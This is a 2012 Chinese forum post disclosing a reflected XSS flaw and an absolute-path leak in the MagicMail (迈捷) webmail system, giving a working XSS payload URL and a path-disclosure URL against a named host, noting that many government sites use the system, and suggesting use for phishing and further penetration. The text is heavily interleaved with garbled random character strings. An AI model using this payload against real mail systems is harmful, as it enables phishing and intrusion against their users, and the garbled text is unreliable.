今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
. ~, N& Y5 [9 A- n0 U5 a0 Z& l3 W; u" J1 [: z' a9 T/ f r
! t7 M: G* ?' J- B" d! b" t- D
包含 一个反射性XSS 以及 绝对路径泄漏
& u! |! e0 k7 B, P- p8 y5 r c看了看 貌似全部是linux的。
U+ A) H) [. A7 ~+ n
( I% K3 [/ I" f2 B3 w$ }. X" s& E关键字:迈捷邮件系统 by MagicMail
5 _: H5 v3 |& ]* l8 d1 z) |" f0 j, ~) C& B7 c5 @
可以看到很多政府网站都用这个邮件系统4 @; ^9 o: F a+ u& H7 Y
* s% L$ @1 Z# ]5 H0 \2 c
绝对路径 http://madman.in/index.php?login_type=declare&language=
( J2 Y c K2 X" H/ D
; y o, e) _% l( \2 T/ A7 _4 B
1 _% K! U2 ^4 S$ W
7 T. G ^6 |, z! B" G) WXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E- H! `- B1 X9 `( H
. u* s5 T; x$ ]! v( y- {& |
) W# h+ U8 E! U3 q/ N
) P* e3 |1 K+ `# C, B' j虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
* v6 W( Q% e6 _2 q: V0 o) s 1 Y i/ Z* m7 t7 g, Y
修复方案:看官方补丁吧。1 i f% i9 ]9 _/ Q
|
发表于 2012-11-9 20:38:41
收藏
支持
反对